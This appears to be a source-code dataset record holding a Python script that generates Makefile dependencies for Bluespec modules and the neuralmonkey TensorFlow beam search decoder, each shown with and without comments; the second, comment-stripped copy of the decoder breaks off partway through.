import sys
import glob
import os
import re
def main():
directory = sys.argv[1]
builddir = sys.argv[2]
extra_module = ""
if(len(sys.argv) > 3):
extra_module = sys.argv[3]
projectModules = {}
for filename in glob.glob(os.path.join(directory, '*.bsv')):
m = re.match(".*/(.*).bsv", filename)
modName = m.group(1).strip()
projectModules[modName] = []
with open(filename, "r") as f:
for line in f:
if line.strip().startswith("import"):
m = re.match("import(.*)::", line.strip())
if m:
mod = m.group(1).strip()
if mod == "`RUN_TEST":
mod = extra_module
projectModules[modName].append(mod)
# Remove duplicates
for module, deps in projectModules.items():
projectModules[module] = list(set(deps))
# Remove non project Dependencies
for module, deps in projectModules.items():
old = list(deps)
for dep in old:
if not dep in projectModules:
deps.remove(dep)
# Create List of modules for dependency resolution
for m, d in projectModules.items():
print("{}/{}.bo: {}/{}.bsv {}".format(builddir, m, directory, m, " ".join(map(lambda x : "{}/{}.bo".format(builddir, x), d))))
depList = []
# Produce dependency list
while len(projectModules.keys()) > 0:
# Look for Module without dependency
found = False
for m, d in projectModules.items():
if not d:
found = True
depList.append(m)
del projectModules[m]
for _, d in projectModules.items():
if m in d:
d.remove(m)
break
if not found:
print("Loop detected")
break
depListFull = []
for d in depList:
d = builddir + "/" + d + ".bo"
depListFull.append(d)
t = "OBJS=" + " ".join(depListFull)
print(t)
if __name__ == '__main__':
main() | #!/usr/bin/python3
import sys
import glob
import os
import re
def main():
directory = sys.argv[1]
builddir = sys.argv[2]
extra_module = ""
if(len(sys.argv) > 3):
extra_module = sys.argv[3]
projectModules = {}
for filename in glob.glob(os.path.join(directory, '*.bsv')):
m = re.match(".*/(.*).bsv", filename)
modName = m.group(1).strip()
projectModules[modName] = []
with open(filename, "r") as f:
for line in f:
if line.strip().startswith("import"):
m = re.match("import(.*)::", line.strip())
if m:
mod = m.group(1).strip()
if mod == "`RUN_TEST":
mod = extra_module
projectModules[modName].append(mod)
# Remove duplicates
for module, deps in projectModules.items():
projectModules[module] = list(set(deps))
# Remove non project Dependencies
for module, deps in projectModules.items():
old = list(deps)
for dep in old:
if not dep in projectModules:
deps.remove(dep)
# Create List of modules for dependency resolution
for m, d in projectModules.items():
print("{}/{}.bo: {}/{}.bsv {}".format(builddir, m, directory, m, " ".join(map(lambda x : "{}/{}.bo".format(builddir, x), d))))
depList = []
# Produce dependency list
while len(projectModules.keys()) > 0:
# Look for Module without dependency
found = False
for m, d in projectModules.items():
if not d:
found = True
depList.append(m)
del projectModules[m]
for _, d in projectModules.items():
if m in d:
d.remove(m)
break
if not found:
print("Loop detected")
break
depListFull = []
for d in depList:
d = builddir + "/" + d + ".bo"
depListFull.append(d)
t = "OBJS=" + " ".join(depListFull)
print(t)
if __name__ == '__main__':
main() | pt | 0.196913 | 2.776094 | 3 |
neuralmonkey/decoders/beam_search_decoder.py | kasnerz/neuralmonkey | 0 | 13574 | <reponame>kasnerz/neuralmonkey<filename>neuralmonkey/decoders/beam_search_decoder.py<gh_stars>0
"""Beam search decoder.
This module implements the beam search algorithm for autoregressive decoders.
As any autoregressive decoder, this decoder works dynamically, which means
it uses the ``tf.while_loop`` function conditioned on both maximum output
length and list of finished hypotheses.
The beam search decoder uses four data structures during the decoding process.
``SearchState``, ``SearchResults``, ``BeamSearchLoopState``, and
``BeamSearchOutput``. The purpose of these is described in their own docstring.
These structures help the decoder to keep track of the decoding, enabling it
to be called e.g. during ensembling, when the content of the structures can be
changed and then fed back to the model.
The implementation mimics the API of the ``AutoregressiveDecoder`` class. There
are functions that prepare and return values that are supplied to the
``tf.while_loop`` function.
"""
# pylint: disable=too-many-lines
# Maybe move the definitions of the named tuple structures to a separate file?
from typing import Any, Callable, List, NamedTuple
# pylint: disable=unused-import
from typing import Optional
# pylint: enable=unused-import
import tensorflow as tf
from typeguard import check_argument_types
from neuralmonkey.decoders.autoregressive import (
AutoregressiveDecoder, LoopState)
from neuralmonkey.decorators import tensor
from neuralmonkey.model.model_part import ModelPart
from neuralmonkey.tf_utils import (
append_tensor, gather_flat, get_state_shape_invariants, partial_transpose,
get_shape_list)
from neuralmonkey.vocabulary import (
Vocabulary, END_TOKEN_INDEX, PAD_TOKEN_INDEX)
# Large finite constant used in place of ``np.inf``. Invalid beam entries
# (all but the first initial hypothesis, and non-padding continuations of
# finished hypotheses) are masked with ``-INF`` so they never win the top-k.
INF = 1e9
class SearchState(NamedTuple(
        "SearchState",
        [("logprob_sum", tf.Tensor),
         ("prev_logprobs", tf.Tensor),
         ("lengths", tf.Tensor),
         ("finished", tf.Tensor)])):
    """Search state of a beam search decoder.

    This structure keeps track of the current state of the beam search
    algorithm. The search state contains tensors that represent the hypotheses
    in the beam, namely their log probability, length, and the distribution
    over the vocabulary from decoding the last word, as well as whether each
    hypothesis is finished or not.

    Attributes:
        logprob_sum: A ``(batch, beam)``-shaped float tensor with the sums of
            token log-probabilities of each hypothesis.
        prev_logprobs: A ``(batch, beam, vocabulary)``-shaped tensor storing
            the log-distribution over the vocabulary from the previous
            decoding step for each hypothesis.
        lengths: A ``(batch, beam)``-shaped int32 tensor with the lengths of
            the hypotheses.
        finished: A boolean tensor with shape ``(batch, beam)``. Marks
            finished and unfinished hypotheses.
    """
class SearchResults(NamedTuple(
        "SearchResults",
        [("scores", tf.Tensor),
         ("token_ids", tf.Tensor)])):
    """The intermediate results of the beam search decoding.

    A cumulative structure that holds the actual decoded tokens and the
    hypotheses' scores (after applying a length penalty term).

    Attributes:
        scores: A ``(time, batch, beam)``-shaped tensor with the scores for
            each hypothesis. The score is computed from the ``logprob_sum`` of
            a hypothesis, accounting for the hypothesis length.
        token_ids: A ``(time, batch, beam)``-shaped tensor with the vocabulary
            indices of the tokens in each hypothesis.
    """
class BeamSearchLoopState(NamedTuple(
        "BeamSearchLoopState",
        [("search_state", SearchState),
         ("search_results", SearchResults),
         ("decoder_loop_state", LoopState)])):
    """The loop state of the beam search decoder.

    A loop state object that is used for transferring data between cycles
    through the symbolic while loop. It groups together the ``SearchState``
    and ``SearchResults`` structures and also keeps track of the underlying
    decoder loop state.

    Attributes:
        search_state: A ``SearchState`` object representing the current search
            state.
        search_results: The growing ``SearchResults`` object which accumulates
            the outputs of the decoding process.
        decoder_loop_state: The current loop state of the underlying
            autoregressive decoder.
    """
class BeamSearchOutput(NamedTuple(
        "BeamSearchOutput",
        [("last_search_step_output", SearchResults),
         ("last_dec_loop_state", NamedTuple),
         ("last_search_state", SearchState),
         ("attention_loop_states", List[Any])])):
    """The final structure that is returned from the while loop.

    Attributes:
        last_search_step_output: A populated ``SearchResults`` object.
        last_dec_loop_state: Final loop state of the underlying decoder.
        last_search_state: Final loop state of the beam search decoder.
        attention_loop_states: The final loop states of the attention objects.
            Currently always an empty list -- see
            ``BeamSearchDecoder.decoding_loop``.
    """
class BeamSearchDecoder(ModelPart):
    """In-graph beam search decoder.

    The hypothesis scoring algorithm is taken from
    https://arxiv.org/pdf/1609.08144.pdf. Length normalization is parameter
    alpha from equation 14.
    """

    def __init__(self,
                 name: str,
                 parent_decoder: AutoregressiveDecoder,
                 beam_size: int,
                 max_steps: int,
                 length_normalization: float) -> None:
        """Construct the beam search decoder graph.

        Arguments:
            name: The name for the model part.
            parent_decoder: An autoregressive decoder from which to sample.
            beam_size: The number of hypotheses in the beam.
            max_steps: The maximum number of time steps to perform.
            length_normalization: The alpha parameter from Eq. 14 in the paper.
        """
        check_argument_types()
        ModelPart.__init__(self, name)

        self.parent_decoder = parent_decoder
        self.beam_size = beam_size
        self.length_normalization = length_normalization
        self.max_steps_int = max_steps

        # Create a placeholder for the maximum number of steps. This is
        # necessary during ensembling, when the decoder is called repetitively
        # with the max_steps attribute set to one.
        self.max_steps = tf.placeholder_with_default(self.max_steps_int, [])

        # Populated lazily in the ``outputs`` property.
        self._initial_loop_state = None  # type: Optional[BeamSearchLoopState]

    @tensor
    def outputs(self) -> tf.Tensor:
        # This is an ugly hack for handling the whole graph when expanding to
        # the beam. We need to access all the inner states of the network in
        # the graph, replace them with beam-size-times copied originals, create
        # the beam search graph, and then replace the inner states back.
        enc_states = self.parent_decoder.encoder_states
        enc_masks = self.parent_decoder.encoder_masks

        # Temporarily monkey-patch the parent decoder so that it sees
        # beam-expanded encoder states and masks while we build the graph.
        setattr(self.parent_decoder, "encoder_states",
                lambda: [self.expand_to_beam(sts) for sts in enc_states()])
        setattr(self.parent_decoder, "encoder_masks",
                lambda: [self.expand_to_beam(mask) for mask in enc_masks()])

        # Create the beam search symbolic graph.
        with self.use_scope():
            self._initial_loop_state = self.get_initial_loop_state()
            outputs = self.decoding_loop()

        # Reassign the original encoder states and mask back
        setattr(self.parent_decoder, "encoder_states", enc_states)
        setattr(self.parent_decoder, "encoder_masks", enc_masks)

        return outputs

    @property
    def initial_loop_state(self) -> BeamSearchLoopState:
        """Return the initial loop state, failing if not yet constructed."""
        if self._initial_loop_state is None:
            raise RuntimeError("Initial loop state was not initialized")
        return self._initial_loop_state

    @property
    def vocabulary(self) -> Vocabulary:
        """Return the output vocabulary of the parent decoder."""
        return self.parent_decoder.vocabulary

    # Note that the attributes search_state, decoder_state, and search_results
    # are used only when ensembling, which is done with max_steps set to one
    # and calling the beam search decoder repetitively.
    @tensor
    def search_state(self) -> SearchState:
        return self.initial_loop_state.search_state

    @tensor
    def decoder_state(self) -> LoopState:
        return self.initial_loop_state.decoder_loop_state

    @tensor
    def search_results(self) -> SearchResults:
        return self.initial_loop_state.search_results

    def get_initial_loop_state(self) -> BeamSearchLoopState:
        """Construct the initial loop state for the beam search decoder.

        During the construction, the body function of the underlying decoder
        is called once to retrieve the initial log probabilities of the first
        token.

        The values are initialized as follows:

        - ``search_state``
            - ``logprob_sum`` - For each sentence in batch, logprob sum of the
              first hypothesis in the beam is set to zero while the others are
              set to negative infinity.
            - ``prev_logprobs`` - This is the softmax over the logits from the
              initial decoder step.
            - ``lengths`` - All zeros.
            - ``finished`` - All false.

        - ``search_results``
            - ``scores`` - A (batch, beam)-sized tensor of zeros.
            - ``token_ids`` - A (1, batch, beam)-sized tensor filled with
              indices of decoder-specific initial input symbols (usually start
              symbol IDs).

        - ``decoder_loop_state`` - The loop state of the underlying
          autoregressive decoder, as returned from the initial call to the
          body function.

        Returns:
            A populated ``BeamSearchLoopState`` structure.
        """
        # Get the initial loop state of the underlying decoder. Then, expand
        # the tensors from the loop state to (batch * beam) and inject them
        # back into the decoder loop state.
        dec_init_ls = self.parent_decoder.get_initial_loop_state()

        feedables = tf.contrib.framework.nest.map_structure(
            self.expand_to_beam, dec_init_ls.feedables)
        # Histories are time-major, so the batch axis to expand is dim 1.
        histories = tf.contrib.framework.nest.map_structure(
            lambda x: self.expand_to_beam(x, dim=1), dec_init_ls.histories)

        constants = tf.constant(0)
        if dec_init_ls.constants:
            constants = tf.contrib.framework.nest.map_structure(
                self.expand_to_beam, dec_init_ls.constants)

        dec_init_ls = dec_init_ls._replace(
            feedables=feedables,
            histories=histories,
            constants=constants)

        # Call the decoder body function with the expanded loop state to get
        # the log probabilities of the possible first tokens.
        decoder_body = self.parent_decoder.get_body(False)
        dec_next_ls = decoder_body(*dec_init_ls)

        # Construct the initial loop state of the beam search decoder. To
        # allow ensembling, the values are replaced with placeholders with a
        # default value. Although this is necessary only for variables that
        # grow in time, the placeholder replacement is done on the whole
        # structures, as you can see below.
        # NOTE(review): ``self.batch_size`` is not defined in this class;
        # presumably it is provided by ModelPart -- confirm.
        search_state = SearchState(
            logprob_sum=tf.tile(
                tf.expand_dims([0.0] + [-INF] * (self.beam_size - 1), 0),
                [self.batch_size, 1],
                name="bs_logprob_sum"),
            prev_logprobs=tf.reshape(
                tf.nn.log_softmax(dec_next_ls.feedables.prev_logits),
                [self.batch_size, self.beam_size, len(self.vocabulary)]),
            lengths=tf.zeros(
                [self.batch_size, self.beam_size], dtype=tf.int32,
                name="bs_lengths"),
            finished=tf.zeros(
                [self.batch_size, self.beam_size], dtype=tf.bool))

        # We add the input_symbol to token_ids during search_results
        # initialization for a simpler beam body implementation.
        search_results = SearchResults(
            scores=tf.zeros(
                shape=[self.batch_size, self.beam_size],
                dtype=tf.float32,
                name="beam_scores"),
            token_ids=tf.reshape(
                feedables.input_symbol,
                [1, self.batch_size, self.beam_size],
                name="beam_tokens"))

        # In structures that contain tensors that grow in time, we replace
        # tensors with placeholders with loosened shape constraints in the
        # time dimension.
        dec_next_ls = tf.contrib.framework.nest.map_structure(
            lambda x: tf.placeholder_with_default(
                x, get_state_shape_invariants(x)),
            dec_next_ls)

        search_results = tf.contrib.framework.nest.map_structure(
            lambda x: tf.placeholder_with_default(
                x, get_state_shape_invariants(x)),
            search_results)

        return BeamSearchLoopState(
            search_state=search_state,
            search_results=search_results,
            decoder_loop_state=dec_next_ls)

    def loop_continue_criterion(self, *args) -> tf.Tensor:
        """Decide whether to break out of the while loop.

        The criterion for stopping the loop is that either all hypotheses are
        finished or a maximum number of steps has been reached. Here the number
        of steps is the number of steps of the underlying decoder minus one,
        because this function is evaluated after the decoder step has been
        called and its step has been incremented. This is caused by the fact
        that we call the decoder body function at the end of the beam body
        function. (And that, in turn, is to support ensembling.)

        Arguments:
            args: A ``BeamSearchLoopState`` instance.

        Returns:
            A scalar boolean ``Tensor``.
        """
        loop_state = BeamSearchLoopState(*args)
        beam_step = loop_state.decoder_loop_state.feedables.step - 1
        finished = loop_state.search_state.finished

        max_step_cond = tf.less(beam_step, self.max_steps)
        unfinished_cond = tf.logical_not(tf.reduce_all(finished))

        return tf.logical_and(max_step_cond, unfinished_cond)

    def decoding_loop(self) -> BeamSearchOutput:
        """Create the decoding loop.

        This function mimics the behavior of the ``decoding_loop`` method of
        the ``AutoregressiveDecoder``, except the initial loop state is
        created outside this method because it is accessed and fed during
        ensembling.

        TODO: The ``finalize_loop`` method and the handling of attention loop
        states might be implemented in the future.

        Returns:
            This method returns a populated ``BeamSearchOutput`` object.
        """
        final_loop_state = tf.while_loop(
            self.loop_continue_criterion,
            self.get_body(),
            self.initial_loop_state,
            shape_invariants=tf.contrib.framework.nest.map_structure(
                get_state_shape_invariants, self.initial_loop_state))

        # TODO: return att_loop_states properly
        return BeamSearchOutput(
            last_search_step_output=final_loop_state.search_results,
            last_dec_loop_state=final_loop_state.decoder_loop_state,
            last_search_state=final_loop_state.search_state,
            attention_loop_states=[])

    def get_body(self) -> Callable[[Any], BeamSearchLoopState]:
        """Return a body function for ``tf.while_loop``.

        Returns:
            A function that performs a single decoding step.
        """
        decoder_body = self.parent_decoder.get_body(train_mode=False)

        # pylint: disable=too-many-locals
        def body(*args: Any) -> BeamSearchLoopState:
            """Execute a single beam search step.

            An implementation of the beam search algorithm, which works as
            follows:

            1. Create a valid ``logprobs`` tensor which contains distributions
               over the output tokens for each hypothesis in the beam. For
               finished hypotheses, the log probabilities of all tokens except
               the padding token are set to negative infinity.

            2. Expand the beam by appending every possible token to every
               existing hypothesis. Update the log probabilitiy sum of each
               hypothesis and its length (add one for unfinished hypotheses).
               For each hypothesis, compute the score using the length penalty
               term.

            3. Select the ``beam_size`` best hypotheses from the score pool.
               This is implemented by flattening the scores tensor and using
               the ``tf.nn.top_k`` function.

            4. Reconstruct the beam by gathering elements from the original
               data structures using the data indices computed in the previous
               step.

            5. Call the ``body`` function of the underlying decoder.

            6. Populate a new ``BeamSearchLoopState`` object with the selected
               values and with the newly obtained decoder loop state.

            Note that this function expects the decoder to be called at least
            once prior the first execution.

            Arguments:
                args: An instance of the ``BeamSearchLoopState`` structure.
                    (see the docs for this module)

            Returns:
                A ``BeamSearchLoopState`` after one step of the decoding.
            """
            loop_state = BeamSearchLoopState(*args)
            dec_loop_state = loop_state.decoder_loop_state
            search_state = loop_state.search_state
            search_results = loop_state.search_results

            # Step 1: mask the probabilities. Finished hypotheses may only
            # continue with the padding token (at zero cost); every other
            # continuation is pushed to -INF.
            # shape(logprobs) = [batch, beam, vocabulary]
            logprobs = search_state.prev_logprobs

            finished_mask = tf.expand_dims(
                tf.to_float(search_state.finished), 2)
            unfinished_logprobs = (1. - finished_mask) * logprobs

            finished_row = tf.one_hot(
                PAD_TOKEN_INDEX,
                len(self.vocabulary),
                dtype=tf.float32,
                on_value=0.,
                off_value=-INF)

            finished_logprobs = finished_mask * finished_row
            logprobs = unfinished_logprobs + finished_logprobs

            # Step 2: update hypothesis scores
            # shape(hyp_probs) = [batch, beam, vocabulary]
            hyp_probs = tf.expand_dims(search_state.logprob_sum, 2) + logprobs

            # update hypothesis lengths (finished hypotheses do not grow)
            hyp_lengths = search_state.lengths + 1 - tf.to_int32(
                search_state.finished)

            # shape(scores) = [batch, beam, vocabulary]
            scores = hyp_probs / tf.expand_dims(
                self._length_penalty(hyp_lengths), 2)

            # Step 3: flatten the beam and vocabulary dimensions so that
            # top-k picks the best expansions across the whole beam.
            # reshape to [batch, beam * vocabulary] for topk
            scores_flat = tf.reshape(
                scores, [-1, self.beam_size * len(self.vocabulary)])

            # shape(both) = [batch, beam]
            topk_scores, topk_indices = tf.nn.top_k(
                scores_flat, k=self.beam_size)

            topk_indices.set_shape([None, self.beam_size])
            topk_scores.set_shape([None, self.beam_size])

            # Decompose a flat index into (source beam, vocabulary token).
            next_word_ids = tf.mod(topk_indices, len(self.vocabulary))
            next_beam_ids = tf.div(topk_indices, len(self.vocabulary))

            # Step 4: reconstruct the beam.
            # batch offset for tf.gather_nd
            batch_offset = tf.tile(
                tf.expand_dims(tf.range(self.batch_size), 1),
                [1, self.beam_size])
            batch_beam_ids = tf.stack([batch_offset, next_beam_ids], axis=2)

            # gather the topk logprob_sums
            next_beam_lengths = tf.gather_nd(hyp_lengths, batch_beam_ids)
            next_beam_logprob_sum = tf.gather_nd(
                tf.reshape(
                    hyp_probs, [-1, self.beam_size * len(self.vocabulary)]),
                tf.stack([batch_offset, topk_indices], axis=2))

            # mark finished beams
            next_finished = tf.gather_nd(search_state.finished, batch_beam_ids)
            next_just_finished = tf.equal(next_word_ids, END_TOKEN_INDEX)
            next_finished = tf.logical_or(next_finished, next_just_finished)

            # we need to flatten the feedables for the parent_decoder
            next_feedables = tf.contrib.framework.nest.map_structure(
                lambda x: gather_flat(x, batch_beam_ids,
                                      self.batch_size, self.beam_size),
                dec_loop_state.feedables)

            next_feedables = next_feedables._replace(
                input_symbol=tf.reshape(next_word_ids, [-1]),
                finished=tf.reshape(next_finished, [-1]))

            # histories have shape [len, batch, ...]; transpose to
            # batch-major, gather the surviving beams, transpose back
            def gather_fn(x):
                return partial_transpose(
                    gather_flat(
                        partial_transpose(x, [1, 0]),
                        batch_beam_ids,
                        self.batch_size,
                        self.beam_size),
                    [1, 0])

            next_histories = tf.contrib.framework.nest.map_structure(
                gather_fn, dec_loop_state.histories)

            dec_loop_state = dec_loop_state._replace(
                feedables=next_feedables,
                histories=next_histories)

            # Step 5: CALL THE DECODER BODY FUNCTION
            next_loop_state = decoder_body(*dec_loop_state)

            # Step 6: populate the next loop state.
            next_search_state = SearchState(
                logprob_sum=next_beam_logprob_sum,
                prev_logprobs=tf.reshape(
                    tf.nn.log_softmax(next_loop_state.feedables.prev_logits),
                    [self.batch_size, self.beam_size, len(self.vocabulary)]),
                lengths=next_beam_lengths,
                finished=next_finished)

            # Reorder the already-decoded token ids so that each row keeps
            # following the hypothesis it now belongs to.
            next_token_ids = tf.transpose(search_results.token_ids, [1, 2, 0])
            next_token_ids = tf.gather_nd(next_token_ids, batch_beam_ids)
            next_token_ids = tf.transpose(next_token_ids, [2, 0, 1])

            next_output = SearchResults(
                scores=topk_scores,
                token_ids=append_tensor(next_token_ids, next_word_ids))

            return BeamSearchLoopState(
                search_state=next_search_state,
                search_results=next_output,
                decoder_loop_state=next_loop_state)
        # pylint: enable=too-many-locals

        return body

    def _length_penalty(self, lengths: tf.Tensor) -> tf.Tensor:
        """Apply length penalty ("lp") term from Eq. 14.

        https://arxiv.org/pdf/1609.08144.pdf

        Arguments:
            lengths: A ``Tensor`` of lengths of the hypotheses in the beam.

        Returns:
            A float ``Tensor`` with the length penalties for each hypothesis
            in the beam.
        """
        return ((5. + tf.to_float(lengths)) / 6.) ** self.length_normalization

    def expand_to_beam(self, val: tf.Tensor, dim: int = 0) -> tf.Tensor:
        """Copy a tensor along a new beam dimension.

        Arguments:
            val: The ``Tensor`` to expand.
            dim: The dimension along which to expand. Usually, the batch axis.

        Returns:
            The expanded tensor.
        """
        orig_shape = get_shape_list(val)
        # Scalars have no batch axis to expand.
        if val.shape.ndims == 0:
            return val

        orig_shape[dim] *= self.beam_size
        tile_shape = [1] * (len(orig_shape) + 1)
        tile_shape[dim + 1] = self.beam_size

        # Insert a beam axis next to ``dim``, tile it, and fold it back into
        # ``dim`` so the result is beam-expanded in place.
        val = tf.tile(tf.expand_dims(val, 1), tile_shape)
        val = tf.reshape(val, orig_shape)

        return val
| """Beam search decoder.
This module implements the beam search algorithm for autoregressive decoders.
As any autoregressive decoder, this decoder works dynamically, which means
it uses the ``tf.while_loop`` function conditioned on both maximum output
length and list of finished hypotheses.
The beam search decoder uses four data structures during the decoding process.
``SearchState``, ``SearchResults``, ``BeamSearchLoopState``, and
``BeamSearchOutput``. The purpose of these is described in their own docstring.
These structures help the decoder to keep track of the decoding, enabling it
to be called e.g. during ensembling, when the content of the structures can be
changed and then fed back to the model.
The implementation mimics the API of the ``AutoregressiveDecoder`` class. There
are functions that prepare and return values that are supplied to the
``tf.while_loop`` function.
"""
# pylint: disable=too-many-lines
# Maybe move the definitions of the named tuple structures to a separate file?
from typing import Any, Callable, List, NamedTuple
# pylint: disable=unused-import
from typing import Optional
# pylint: enable=unused-import
import tensorflow as tf
from typeguard import check_argument_types
from neuralmonkey.decoders.autoregressive import (
AutoregressiveDecoder, LoopState)
from neuralmonkey.decorators import tensor
from neuralmonkey.model.model_part import ModelPart
from neuralmonkey.tf_utils import (
append_tensor, gather_flat, get_state_shape_invariants, partial_transpose,
get_shape_list)
from neuralmonkey.vocabulary import (
Vocabulary, END_TOKEN_INDEX, PAD_TOKEN_INDEX)
# Constant we use in place of the np.inf
INF = 1e9
class SearchState(NamedTuple(
"SearchState",
[("logprob_sum", tf.Tensor),
("prev_logprobs", tf.Tensor),
("lengths", tf.Tensor),
("finished", tf.Tensor)])):
"""Search state of a beam search decoder.
This structure keeps track of a current state of the beam search
algorithm. The search state contains tensors that represent hypotheses in
the beam, namely their log probability, length, and distribution over the
vocabulary when decoding the last word, as well as if the hypothesis is
finished or not.
Attributes:
logprob_sum: A ``(batch, beam)``-shaped tensor with the sums of token
log-probabilities of each hypothesis.
prev_logprobs: A ``(batch, beam, vocabulary)``-sized tensor. Stores
the log-distribution over the vocabulary from the previous decoding
step for each hypothesis.
lengths: A ``(batch, beam)``-shaped tensor with the lengths of the
hypotheses.
finished: A boolean tensor with shape ``(batch, beam)``. Marks finished
and unfinished hypotheses.
"""
class SearchResults(NamedTuple(
"SearchResults",
[("scores", tf.Tensor),
("token_ids", tf.Tensor)])):
"""The intermediate results of the beam search decoding.
    A cumulative structure that holds the actual decoded tokens and hypotheses
scores (after applying a length penalty term).
Attributes:
scores: A ``(time, batch, beam)``-shaped tensor with the scores for
each hypothesis. The score is computed from the ``logprob_sum`` of
a hypothesis and accounting for the hypothesis length.
token_ids: A ``(time, batch, beam)``-shaped tensor with the vocabulary
indices of the tokens in each hypothesis.
"""
class BeamSearchLoopState(NamedTuple(
"BeamSearchLoopState",
[("search_state", SearchState),
("search_results", SearchResults),
("decoder_loop_state", LoopState)])):
"""The loop state of the beam search decoder.
A loop state object that is used for transferring data between cycles
through the symbolic while loop. It groups together the ``SearchState`` and
``SearchResults`` structures and also keeps track of the underlying decoder
loop state.
Attributes:
search_state: A ``SearchState`` object representing the current search
state.
        search_results: The growing ``SearchResults`` object which accumulates
the outputs of the decoding process.
decoder_loop_state: The current loop state of the underlying
autoregressive decoder.
"""
class BeamSearchOutput(NamedTuple(
"BeamSearchOutput",
[("last_search_step_output", SearchResults),
("last_dec_loop_state", NamedTuple),
("last_search_state", SearchState),
("attention_loop_states", List[Any])])):
"""The final structure that is returned from the while loop.
Attributes:
last_search_step_output: A populated ``SearchResults`` object.
last_dec_loop_state: Final loop state of the underlying decoder.
last_search_state: Final loop state of the beam search decoder.
attention_loop_states: The final loop states of the attention objects.
"""
class BeamSearchDecoder(ModelPart):
"""In-graph beam search decoder.
The hypothesis scoring algorithm is taken from
https://arxiv.org/pdf/1609.08144.pdf. Length normalization is parameter
alpha from equation 14.
"""
def __init__(self,
name: str,
parent_decoder: AutoregressiveDecoder,
beam_size: int,
max_steps: int,
length_normalization: float) -> None:
"""Construct the beam search decoder graph.
Arguments:
name: The name for the model part.
parent_decoder: An autoregressive decoder from which to sample.
beam_size: The number of hypotheses in the beam.
max_steps: The maximum number of time steps to perform.
length_normalization: The alpha parameter from Eq. 14 in the paper.
"""
check_argument_types()
ModelPart.__init__(self, name)
self.parent_decoder = parent_decoder
self.beam_size = beam_size
self.length_normalization = length_normalization
self.max_steps_int = max_steps
# Create a placeholder for maximum number of steps that is necessary
# during ensembling, when the decoder is called repetitively with the
# max_steps attribute set to one.
self.max_steps = tf.placeholder_with_default(self.max_steps_int, [])
self._initial_loop_state = None # type: Optional[BeamSearchLoopState]
@tensor
def outputs(self) -> tf.Tensor:
# This is an ugly hack for handling the whole graph when expanding to
# the beam. We need to access all the inner states of the network in
# the graph, replace them with beam-size-times copied originals, create
# the beam search graph, and then replace the inner states back.
enc_states = self.parent_decoder.encoder_states
enc_masks = self.parent_decoder.encoder_masks
setattr(self.parent_decoder, "encoder_states",
lambda: [self.expand_to_beam(sts) for sts in enc_states()])
setattr(self.parent_decoder, "encoder_masks",
lambda: [self.expand_to_beam(mask) for mask in enc_masks()])
# Create the beam search symbolic graph.
with self.use_scope():
self._initial_loop_state = self.get_initial_loop_state()
outputs = self.decoding_loop()
# Reassign the original encoder states and mask back
setattr(self.parent_decoder, "encoder_states", enc_states)
setattr(self.parent_decoder, "encoder_masks", enc_masks)
return outputs
@property
def initial_loop_state(self) -> BeamSearchLoopState:
if self._initial_loop_state is None:
raise RuntimeError("Initial loop state was not initialized")
return self._initial_loop_state
@property
def vocabulary(self) -> Vocabulary:
return self.parent_decoder.vocabulary
# Note that the attributes search_state, decoder_state, and search_results
# are used only when ensembling, which is done with max_steps set to one
# and calling the beam search decoder repetitively.
@tensor
def search_state(self) -> SearchState:
return self.initial_loop_state.search_state
@tensor
def decoder_state(self) -> LoopState:
return self.initial_loop_state.decoder_loop_state
@tensor
def search_results(self) -> SearchResults:
return self.initial_loop_state.search_results
def get_initial_loop_state(self) -> BeamSearchLoopState:
"""Construct the initial loop state for the beam search decoder.
During the construction, the body function of the underlying decoder
is called once to retrieve the initial log probabilities of the first
token.
The values are initialized as follows:
- ``search_state``
- ``logprob_sum`` - For each sentence in batch, logprob sum of the
first hypothesis in the beam is set to zero while the others are
set to negative infinity.
- ``prev_logprobs`` - This is the softmax over the logits from the
initial decoder step.
- ``lengths`` - All zeros.
          - ``finished`` - All false.
- ``search_results``
- ``scores`` - A (batch, beam)-sized tensor of zeros.
- ``token_ids`` - A (1, batch, beam)-sized tensor filled with
indices of decoder-specific initial input symbols (usually start
symbol IDs).
- ``decoder_loop_state`` - The loop state of the underlying
autoregressive decoder, as returned from the initial call to the
body function.
Returns:
A populated ``BeamSearchLoopState`` structure.
"""
# Get the initial loop state of the underlying decoder. Then, expand
# the tensors from the loop state to (batch * beam) and inject them
# back into the decoder loop state.
dec_init_ls = self.parent_decoder.get_initial_loop_state()
feedables = tf.contrib.framework.nest.map_structure(
self.expand_to_beam, dec_init_ls.feedables)
histories = tf.contrib.framework.nest.map_structure(
lambda x: self.expand_to_beam(x, dim=1), dec_init_ls.histories)
constants = tf.constant(0)
if dec_init_ls.constants:
constants = tf.contrib.framework.nest.map_structure(
self.expand_to_beam, dec_init_ls.constants)
dec_init_ls = dec_init_ls._replace(
feedables=feedables,
histories=histories,
constants=constants)
# Call the decoder body function with the expanded loop state to get
# the log probabilities of the possible first tokens.
decoder_body = self.parent_decoder.get_body(False)
dec_next_ls = decoder_body(*dec_init_ls)
# Construct the initial loop state of the beam search decoder. To allow
# ensembling, the values are replaced with placeholders with a default
# value. Despite this is necessary only for variables that grow in
# time, the placeholder replacement is done on the whole structures, as
# you can see below.
search_state = SearchState(
logprob_sum=tf.tile(
tf.expand_dims([0.0] + [-INF] * (self.beam_size - 1), 0),
[self.batch_size, 1],
name="bs_logprob_sum"),
prev_logprobs=tf.reshape(
tf.nn.log_softmax(dec_next_ls.feedables.prev_logits),
[self.batch_size, self.beam_size, len(self.vocabulary)]),
lengths=tf.zeros(
[self.batch_size, self.beam_size], dtype=tf.int32,
name="bs_lengths"),
finished=tf.zeros(
[self.batch_size, self.beam_size], dtype=tf.bool))
# We add the input_symbol to token_ids during search_results
# initialization for simpler beam_body implementation
search_results = SearchResults(
scores=tf.zeros(
shape=[self.batch_size, self.beam_size],
dtype=tf.float32,
name="beam_scores"),
token_ids=tf.reshape(
feedables.input_symbol,
[1, self.batch_size, self.beam_size],
name="beam_tokens"))
# In structures that contain tensors that grow in time, we replace
# tensors with placeholders with loosened shape constraints in the time
# dimension.
dec_next_ls = tf.contrib.framework.nest.map_structure(
lambda x: tf.placeholder_with_default(
x, get_state_shape_invariants(x)),
dec_next_ls)
search_results = tf.contrib.framework.nest.map_structure(
lambda x: tf.placeholder_with_default(
x, get_state_shape_invariants(x)),
search_results)
return BeamSearchLoopState(
search_state=search_state,
search_results=search_results,
decoder_loop_state=dec_next_ls)
def loop_continue_criterion(self, *args) -> tf.Tensor:
"""Decide whether to break out of the while loop.
The criterion for stopping the loop is that either all hypotheses are
finished or a maximum number of steps has been reached. Here the number
of steps is the number of steps of the underlying decoder minus one,
because this function is evaluated after the decoder step has been
